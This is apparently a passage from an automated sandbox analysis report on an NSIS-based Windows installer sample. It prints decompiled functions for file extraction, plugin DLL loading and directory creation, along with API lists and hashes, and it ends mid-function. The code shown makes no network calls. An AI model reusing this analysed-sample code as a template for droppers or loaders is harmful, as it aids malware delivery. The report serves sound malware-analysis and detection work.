						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, "C:\Users\hardz\AppData\Local\Temp\nssF140.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427("C:\Users\hardz\AppData\Local\Temp\nssF140.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                                        0x00401734
                                                                                                        0x0040173b
                                                                                                        0x00401744
                                                                                                        0x00401747
                                                                                                        0x0040174a
                                                                                                        0x0040174f
                                                                                                        0x00401757
                                                                                                        0x00401773
                                                                                                        0x00401759
                                                                                                        0x00401759
                                                                                                        0x0040175a
                                                                                                        0x0040175a
                                                                                                        0x00401779
                                                                                                        0x00401783
                                                                                                        0x00401783
                                                                                                        0x00401787
                                                                                                        0x0040178a
                                                                                                        0x0040178f
                                                                                                        0x00401791
                                                                                                        0x00401793
                                                                                                        0x00401798
                                                                                                        0x00401798
                                                                                                        0x004017a3
                                                                                                        0x004017a3
                                                                                                        0x004017b4
                                                                                                        0x004017b6
                                                                                                        0x004017b6
                                                                                                        0x004017b7
                                                                                                        0x004017b7
                                                                                                        0x004017ba
                                                                                                        0x004017bd
                                                                                                        0x004017c0
                                                                                                        0x004017c0
                                                                                                        0x004017c7
                                                                                                        0x004017d6
                                                                                                        0x004017db
                                                                                                        0x004017de
                                                                                                        0x004017e1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004017e3
                                                                                                        0x004017e6
                                                                                                        0x00401840
                                                                                                        0x00401845
                                                                                                        0x004015a8
                                                                                                        0x0040265c
                                                                                                        0x0040265c
                                                                                                        0x0040288b
                                                                                                        0x0040288e
                                                                                                        0x0040288e
                                                                                                        0x00000000
                                                                                                        0x004017e8
                                                                                                        0x004017ee
                                                                                                        0x004017f9
                                                                                                        0x00401806
                                                                                                        0x00401811
                                                                                                        0x00401827
                                                                                                        0x00401827
                                                                                                        0x0040182a
                                                                                                        0x00000000
                                                                                                        0x00401830
                                                                                                        0x00401830
                                                                                                        0x00401831
                                                                                                        0x0040184e
                                                                                                        0x00402894
                                                                                                        0x00402894
                                                                                                        0x00402894
                                                                                                        0x00401833
                                                                                                        0x00401833
                                                                                                        0x00401834
                                                                                                        0x00401492
                                                                                                        0x0040220e
                                                                                                        0x0040220e
                                                                                                        0x0040220e
                                                                                                        0x00401831
                                                                                                        0x0040182a
                                                                                                        0x00402896
                                                                                                        0x0040289a
                                                                                                        0x0040289a
                                                                                                        0x0040185e
                                                                                                        0x00401863
                                                                                                        0x00401871
                                                                                                        0x00401876
                                                                                                        0x0040187c
                                                                                                        0x00401880
                                                                                                        0x00401882
                                                                                                        0x0040188a
                                                                                                        0x00401896
                                                                                                        0x00401884
                                                                                                        0x00401884
                                                                                                        0x00401888
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00401888
                                                                                                        0x0040189f
                                                                                                        0x004018a5
                                                                                                        0x004018a7
                                                                                                        0x00000000
                                                                                                        0x004018ad
                                                                                                        0x004018ad
                                                                                                        0x004018b0
                                                                                                        0x004018c8
                                                                                                        0x004018b2
                                                                                                        0x004018b5
                                                                                                        0x004018be
                                                                                                        0x004018be
                                                                                                        0x004018cd
                                                                                                        0x004018d2
                                                                                                        0x00402209
                                                                                                        0x00000000
                                                                                                        0x00402209
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                          • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                          • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nssF140.tmp$C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll$Call
                                                                                                        • API String ID: 1941528284-2297853244
                                                                                                        • Opcode ID: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                                        • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                                        • Opcode Fuzzy Hash: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                                        • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                                                                        0x00402f1d
                                                                                                        0x00402f27
                                                                                                        0x00402f30
                                                                                                        0x00402f34
                                                                                                        0x00402f3f
                                                                                                        0x00402f3f
                                                                                                        0x00402f47
                                                                                                        0x00402f49
                                                                                                        0x00402f50
                                                                                                        0x00402f6c
                                                                                                        0x00402f70
                                                                                                        0x00403039
                                                                                                        0x00403039
                                                                                                        0x00000000
                                                                                                        0x00402f7f
                                                                                                        0x00402f82
                                                                                                        0x00402f88
                                                                                                        0x00402f8f
                                                                                                        0x00402f92
                                                                                                        0x00402f9b
                                                                                                        0x00403008
                                                                                                        0x0040300e
                                                                                                        0x00403010
                                                                                                        0x00403010
                                                                                                        0x00403022
                                                                                                        0x00403026
                                                                                                        0x00000000
                                                                                                        0x00403028
                                                                                                        0x00403028
                                                                                                        0x0040302b
                                                                                                        0x00403031
                                                                                                        0x00000000
                                                                                                        0x00403031
                                                                                                        0x00402f9d
                                                                                                        0x00402fa0
                                                                                                        0x00403034
                                                                                                        0x00403034
                                                                                                        0x00402fa6
                                                                                                        0x00402fab
                                                                                                        0x00402fab
                                                                                                        0x00402fb3
                                                                                                        0x00402fb5
                                                                                                        0x00402fb5
                                                                                                        0x00402fc6
                                                                                                        0x00402fca
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402fde
                                                                                                        0x00402fe6
                                                                                                        0x00403004
                                                                                                        0x0040303b
                                                                                                        0x0040303b
                                                                                                        0x00402fed
                                                                                                        0x00402fed
                                                                                                        0x00402ff0
                                                                                                        0x00402ff3
                                                                                                        0x00402ff6
                                                                                                        0x00403000
                                                                                                        0x00000000
                                                                                                        0x00403002
                                                                                                        0x00000000
                                                                                                        0x00403002
                                                                                                        0x00403000
                                                                                                        0x00000000
                                                                                                        0x00402fe6
                                                                                                        0x00000000
                                                                                                        0x00402fab
                                                                                                        0x00402fa0
                                                                                                        0x00402f9b
                                                                                                        0x00402f92
                                                                                                        0x00402f70
                                                                                                        0x0040303c
                                                                                                        0x00403040

                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                                        • ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                                        • ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                                        • WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Read$PointerWrite
                                                                                                        • String ID: @0A
                                                                                                        • API String ID: 2113905535-1363546919
                                                                                                        • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                        • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                                        • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                        • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x3fb94
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x36dc6
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x40ba3b
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x3fb94
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                                                                        0x00403047
                                                                                                        0x00403054
                                                                                                        0x00403067
                                                                                                        0x0040306c
                                                                                                        0x004031ad
                                                                                                        0x004031af
                                                                                                        0x00000000
                                                                                                        0x004031b5
                                                                                                        0x00403078
                                                                                                        0x0040308b
                                                                                                        0x00403091
                                                                                                        0x00403097
                                                                                                        0x004030a2
                                                                                                        0x004030a2
                                                                                                        0x004030a7
                                                                                                        0x004030ac
                                                                                                        0x004030b4
                                                                                                        0x004030b6
                                                                                                        0x004030b6
                                                                                                        0x004030bf
                                                                                                        0x004030c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004030cc
                                                                                                        0x004030d2
                                                                                                        0x004030d8
                                                                                                        0x00000000
                                                                                                        0x004030de
                                                                                                        0x004030e4
                                                                                                        0x00403104
                                                                                                        0x00403109
                                                                                                        0x0040310e
                                                                                                        0x00403114
                                                                                                        0x0040311a
                                                                                                        0x00403124
                                                                                                        0x0040312b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040312d
                                                                                                        0x00403133
                                                                                                        0x00403135
                                                                                                        0x00403169
                                                                                                        0x0040316f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403171
                                                                                                        0x00403173
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403175
                                                                                                        0x00403175
                                                                                                        0x00403188
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403197
                                                                                                        0x00000000
                                                                                                        0x00403197
                                                                                                        0x00403145
                                                                                                        0x0040314d
                                                                                                        0x004031a4
                                                                                                        0x004031aa
                                                                                                        0x004031aa
                                                                                                        0x00000000
                                                                                                        0x00403155
                                                                                                        0x00403155
                                                                                                        0x0040315b
                                                                                                        0x00403161
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403167
                                                                                                        0x004031a8
                                                                                                        0x004031a8
                                                                                                        0x00000000
                                                                                                        0x004031a8
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00403058
                                                                                                          • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                                        • WriteFile.KERNELBASE(0040B040,0040BA3B,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                                        • SetFilePointer.KERNELBASE(0003FB94,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$CountTickWrite
                                                                                                        • String ID: @0A
                                                                                                        • API String ID: 2146148272-1363546919
                                                                                                        • Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                        • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                                        • Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                        • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 60%
                                                                                                        			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                        0x00401f51
                                                                                                        0x00401f51
                                                                                                        0x00401f56
                                                                                                        0x00401f5d
                                                                                                        0x00402019
                                                                                                        0x00402164
                                                                                                        0x00402164
                                                                                                        0x0040288b
                                                                                                        0x0040288e
                                                                                                        0x0040289a
                                                                                                        0x0040289a
                                                                                                        0x00401f6c
                                                                                                        0x00401f76
                                                                                                        0x00401f79
                                                                                                        0x00401f88
                                                                                                        0x00401f8c
                                                                                                        0x00401f92
                                                                                                        0x00401f96
                                                                                                        0x00402012
                                                                                                        0x00000000
                                                                                                        0x00402012
                                                                                                        0x00401f98
                                                                                                        0x00401fa2
                                                                                                        0x00401fa6
                                                                                                        0x00401fea
                                                                                                        0x00401fa8
                                                                                                        0x00401fab
                                                                                                        0x00401fae
                                                                                                        0x00401fde
                                                                                                        0x00401fb0
                                                                                                        0x00401fb3
                                                                                                        0x00401fbc
                                                                                                        0x00401fbe
                                                                                                        0x00401fbe
                                                                                                        0x00401fbc
                                                                                                        0x00401fae
                                                                                                        0x00401ff2
                                                                                                        0x00402007
                                                                                                        0x00402007
                                                                                                        0x00000000
                                                                                                        0x00401ff2
                                                                                                        0x00401f7c
                                                                                                        0x00401f82
                                                                                                        0x00401f86
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                          • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                        • String ID: ?B
                                                                                                        • API String ID: 2987980305-117478770
                                                                                                        • Opcode ID: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                                        • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                                        • Opcode Fuzzy Hash: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                                        • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
